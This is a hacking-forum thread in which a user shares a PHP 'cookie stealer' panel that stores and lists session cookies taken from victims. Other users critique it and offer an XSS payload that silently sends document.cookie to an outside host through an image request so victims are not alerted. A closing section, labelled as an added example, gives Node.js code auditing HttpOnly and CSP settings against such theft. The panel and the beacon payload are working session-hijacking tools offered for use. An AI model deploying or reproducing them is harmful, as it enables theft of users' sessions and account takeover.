shadowSQLi

cookie stealer

<?php

//////////////////////
// Cookie stealer
/////////////////////

/*
Database stuff
*/
define('host', ''); // localhost as usual
define('user', ''); // root, gigel or petrica
define('pass', ''); // the user's password
define('db', '');   // the database name

try {
    $db = new mysqli(host, user, pass, db);
} catch (mysqli_sql_exception $e) {
    throw $e;
}

if (isset($_GET['act']) && ($_GET['act'] == "prune")) {
    // Deletes results older than 30 days (MySQL date arithmetic).
    $del_oldrecords = "DELETE FROM `cookies` WHERE `Date` < DATE_SUB(NOW(), INTERVAL 30 DAY)";
    $db->query($del_oldrecords);
    $affected_rows = $db->affected_rows;
    print $affected_rows;
}

$cookie = "SELECT `ID`, `Cookie`, `IP`, `Date` FROM `cookies`";
$raw = $db->query($cookie);

if (!$raw) {
    die('There was an error running the query [' . $db->error . ']');
}

$values = $raw->fetch_all(MYSQLI_ASSOC);
$results = $raw->num_rows;

print 'Prune data: <a href="cookie.php?act=prune">Erase old data</a>';
print 'We\'ve stealed '.number_format($results).' cookies from suckers.';

// Stored values are printed as-is, without HTML escaping.
foreach ($values as $key) {
    print '<tr><td>'.$key['ID'].'</td><td>'.$key['Cookie'].'</td><td>'.$key['IP'].'</td><td>'.$key['Date'].'</td></tr>';
}

?>

Link to comment
Share on other sites

Because copy paste

Where do you get the conclusion that I copied it? I made it myself; I only copied the MySQL connection.

Why do you use mysqli in one script and mysql_* in the other? And why does the SQL insert code always have the same HTML code as the value for the ID field?

Because ID is set from phpMyAdmin to auto-increment.

Edited by TheTime
Link to comment
Share on other sites

So what did you actually do yourself, if you said you copied the SQL? Ah, you stored a GET...

11:16 AM - askwrite clicked Dislikes for this post: query SQL by shadowSQLi

11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi

11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi

11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi

11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi

=)))

Link to comment
Share on other sites

I'm glad to see a few lines of code, you've made my Sunday nicer! :D

You have a persistent XSS in the logs; you don't filter the received cookies at all. If you want to use the script for real, there's a chance others will try to find out who you are. If your script is vulnerable, you're gonna have a bad time!

And put a password on access to the logs.

Link to comment
Share on other sites

OK, thanks, I'll take care of it now :D

Link to comment
Share on other sites

A better idea, so as not to redirect the person away from the page, is to use an image; the fact that the victim gets redirected to another page can raise suspicion.

<script>a=new Image();a.src="http://sitetau.com/cookie.php?shadow="+document.cookie;</script>

Link to comment
Share on other sites
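
The image snippet in the last post depends on two things the target site controls: the session cookie being readable through `document.cookie`, and the browser being allowed to load an image from any host. As an added example (not part of the thread), this Node.js check audits a response's `Set-Cookie` and `Content-Security-Policy` headers for both; the function names and header values are constructed for illustration.

```javascript
// Added defensive example; header values below are constructed samples.

// Parse one Set-Cookie header line into its name and the flag that matters here.
function parseSetCookie(line) {
  const [pair, ...attrs] = line.split(';').map((s) => s.trim());
  const name = pair.split('=')[0];
  const flags = new Set(attrs.map((a) => a.split('=')[0].toLowerCase()));
  return { name, httpOnly: flags.has('httponly') };
}

// Return the source list that governs image loads, or null if CSP sets none.
function imageSources(csp) {
  const directives = new Map();
  for (const part of (csp || '').split(';')) {
    const [name, ...values] = part.trim().split(/\s+/);
    // When a directive is repeated, browsers honour the first occurrence.
    if (name && !directives.has(name.toLowerCase())) {
      directives.set(name.toLowerCase(), values);
    }
  }
  return directives.get('img-src') ?? directives.get('default-src') ?? null;
}

// Simplified check: can the page load an image from an arbitrary third-party host?
function allowsAnyImageHost(csp) {
  const sources = imageSources(csp);
  if (sources === null) return true; // no policy, so nothing is blocked
  return sources.some((s) => ['*', 'http:', 'https:'].includes(s.toLowerCase()));
}

// headers: lower-cased header names; 'set-cookie' is an array of header lines.
function auditResponse(headers) {
  const cookies = (headers['set-cookie'] || []).map(parseSetCookie);
  return {
    scriptReadable: cookies.filter((c) => !c.httpOnly).map((c) => c.name),
    beaconAllowed: allowsAnyImageHost(headers['content-security-policy']),
  };
}

const weak = { 'set-cookie': ['PHPSESSID=abc123; Path=/', 'theme=dark; Path=/'] };
const hardened = {
  'set-cookie': ['PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax', 'theme=dark; Path=/'],
  'content-security-policy': "default-src 'self'; img-src 'self' https://cdn.example",
};
console.log(auditResponse(weak), auditResponse(hardened));
```

`HttpOnly` and a tight `img-src` limit what an injected script can read and where it can send it; they do not remove the underlying XSS, which still needs output encoding on the affected page.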
